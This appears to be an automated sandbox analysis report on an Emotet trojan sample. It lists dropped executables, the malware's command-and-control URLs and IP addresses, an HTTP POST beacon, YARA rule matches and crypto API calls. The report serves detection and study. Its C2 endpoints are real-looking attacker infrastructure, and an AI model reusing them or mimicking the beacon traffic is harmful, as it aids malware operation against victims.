              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 194.187.133.160
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0042BEDB recv,0_2_0042BEDB
              Source: unknownHTTP traffic detected: POST /LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 88.153.35.32/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------oxhn8YFF02lqHFUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.153.35.32Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 17:10:55 GMTServer: ApacheContent-Length: 230Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 52 33 30 5a 53 2f 4b 73 34 56 68 2f 64 37 33 54 63 37 34 77 34 47 4a 52 2f 43 7a 65 68 56 4f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ was not found on this server.</p></body></html>
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/
              Source: mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/4
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/wsock.dll.mui
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/
              Source: mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/?
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/D
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/b
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/67
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/E0jZ
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/W
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/biP8R7/XHAjzKH0LnedA/4
              Source: mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/
              Source: mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/4
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/O
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/b
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/p
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.187.133.160:443/67tfsWS9hNw/KKtRVVGv4EtXppzG6kI/QUenxzCNc1M41S/3mazKpx2CkV0/iq7lqvPWFwbXz
              Source: mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/3
              Source: mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/
              Source: mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/4
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00422175 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00422175
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00422175 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_00422175

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_021F2650

              System Summary

              barindex
              Source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02238CD0 CloseServiceHandle,DeleteService,OpenServiceW,CloseServiceHandle,2_2_02238CD0
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile created: C:\Windows\SysWOW64\rtmpal\
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeFile created: C:\Windows\SysWOW64\KBDTZM\
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile deleted: C:\Windows\SysWOW64\rtmpal\dfscli.exe:Zone.Identifier
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00401E500_2_00401E50
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040B0C20_2_0040B0C2
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_004231F40_2_004231F4
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040E6580_2_0040E658
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00410ECC0_2_00410ECC
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022682400_2_02268240
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022677400_2_02267740
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022665300_2_02266530
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263BA00_2_02263BA0
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263F200_2_02263F20
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02261C700_2_02261C70
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263D100_2_02263D10
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C5ABE0_2_021C5ABE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C92DE0_2_021C92DE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C380E0_2_021C380E
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C58AE0_2_021C58AE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C80CE0_2_021C80CE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C573E0_2_021C573E
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C9DDE0_2_021C9DDE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00401E502_2_00401E50
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040B0C22_2_0040B0C2
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_004231F42_2_004231F4
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040E6582_2_0040E658
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00410ECC2_2_00410ECC
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022382402_2_02238240
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022377402_2_02237740
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022365302_2_02236530
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233BA02_2_02233BA0
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233F202_2_02233F20
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02231C702_2_02231C70
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233D102_2_02233D10
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02195ABE2_2_02195ABE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021992DE2_2_021992DE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0219380E2_2_0219380E
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021958AE2_2_021958AE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021980CE2_2_021980CE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0219573E2_2_0219573E
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02199DDE2_2_02199DDE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F82403_2_021F8240
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F3D103_2_021F3D10
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F65303_2_021F6530
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F3F203_2_021F3F20
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F77403_2_021F7740
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021F1C70
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021F3BA0
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_0218380E
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_02185ABE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021858AE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021892DE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021880CE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_0218573E
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_02189DDE
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: String function: 004243C6 appears 31 times
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: String function: 0040F510 appears 61 times
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: String function: 0040EA88 appears 142 times
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: String function: 004243C6 appears 31 times
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: String function: 0040F510 appears 61 times
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: String function: 0040EA88 appears 142 times
              Source: ExeFile (233).exe, 00000000.00000000.2105550930.0000000000441000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSock.EXEB vs ExeFile (233).exe
              Source: ExeFile (233).exe | Binary or memory string: OriginalFilenameSock.EXEB vs ExeFile (233).exe
              Source: ExeFile (233).exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
